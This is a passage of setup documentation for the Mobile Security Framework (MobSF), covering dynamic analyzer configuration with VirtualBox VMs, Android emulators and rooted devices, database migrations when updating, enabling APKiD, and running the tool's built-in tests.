  • Open the File MobSF_VM_X.X.vbox in any Text Editor and note down the VM UUID and Snapshot UUID.

Here the value of uuid is the VM UUID and currentSnapshot is the Snapshot UUID.

  • Now we have all the things needed to configure the Dynamic Analyzer (Host/Proxy IP, VM IP, VM UUID and Snapshot UUID)
  • Go to MobSF/settings.py and set the appropriate values as
    • UUID = VM UUID
    • SUUID = Snapshot UUID
    • VM_IP = VM IP
    • PROXY_IP = Host/Proxy IP
  • In MobSF/settings.py, set ANDROID_DYNAMIC_ANALYZER = "MobSF_VM" (default)
  • This will configure MobSF to use Android VirtualBox VM for Dynamic Analysis.

Configuring Dynamic Analyzer with with MobSF Android 4.1.2 arm Emulator

  • Make sure Android Studio is installed and an AVD is created. (Nexus 5 with Lollipop image is recommended)
  • Extract MobSF_ARM_Emulator.zip
  • Run scripts/mobsfy_AVD.py script and specify the directory that contains the files extracted from MobSF_ARM_Emulator.zip.
  • In MobSF/settings.py, set ANDROID_DYNAMIC_ANALYZER = "MobSF_AVD"
  • This will configure MobSF to use Android arm Emulator for Dynamic Analysis.

Manual Configuration (not recommended)

  • If mobsfy_AVD.py script is not running successfully, you need to set the values for AVD_EMULATOR and AVD_PATH in MobSF/settings.py manually.
  • Follow the README inside the emulator zip and change all the path fields according to your system
  • edit MobSF/settings.py and modify
AVD_EMULATOR = r'/Users/[USERNAME]/Library/Android/sdk/tools/emulator'
# This can be /Users/[USERNAME]/Library/Android/Sdk/emulator/emulator for newer versions of android SDK

AVD_PATH = r'/Users/[USERNAME]/.android/avd'
 # Path to the avd folder where you extracted the emulator
  • In MobSF/settings.py, set ANDROID_DYNAMIC_ANALYZER = "MobSF_AVD"

Configuring Dynamic Analyzer with Rooted Android 4.03 – 4.4 Device

Configuring Dynamic Analyzer with Rooted Android 4.03 – 4.4 VM

  • MobSFy the Custom VM, Follow the instructions here: Configure MobSF Dynamic Analysis Environment in Custom VM
  • VM on Virtual Box: If the VM is hosted on VirtualBox, follow the same steps that you have followed for configuring MobSF x86 VirtualBox VM and set appropriate VM UUID, Snapshot UUID, Host/Proxy IP, VM IP and set ANDROID_DYNAMIC_ANALYZER = "MobSF_VM"
  • Any Other VM: Configure it as a Real device. Set ANDROID_DYNAMIC_ANALYZER = "MobSF_REAL_DEVICE" and specify DEVICE_IPand DEVICE_ADB_PORT. Snapshot feature is only available with VM(s) hosted in VirtualBox.

Updating MobSF

If you are updating MobSF, In most cases you might have to perform database migrations or you will see errors such as

[ERROR] Saving to DB (E:\Mobile-Security-Framework-MobSF\StaticAnalyzer\views\android\db_interaction.py, LINE 236 "static_db.save()"): table StaticAnalyzer_staticanalyzerandroid has no column named

Run the below command to migrate your db

python3 manage.py makemigrations
python3 manage.py migrate

If the above changes didn’t work, you might have to run clean.sh(present in scripts) in Mac/Linux. After that run the above commands.

NOTE: This will remove the previously saved scan results.

Disabled Components

Some components are disabled by default as they are experimental

APKiD

APKiD is disabled by default. Before enabling you will have to install the rednaga fork of yara-python.

git clone --recursive https://github.com/rednaga/yara-python-1 yara-python
cd yara-python
python3 setup.py build --enable-dex install

Enable APKiD in settings.py by setting APKID_ENABLED to True.

Running Tests

  • Basic Static Analyzer unit tests – run MobSF and navigate to http://127.0.0.1:8000/runtest/
  • MobSF REST API unit tests – run MobSF and navigate to http://127.0.0.1:8000/runapitest/

Screenshots

Static Analysis – Android APK

Static Analysis – iOS IPA

Static Analysis – Windows APPX

Dynamic Analysis – Android APK

Web API Fuzzer

Video Presentation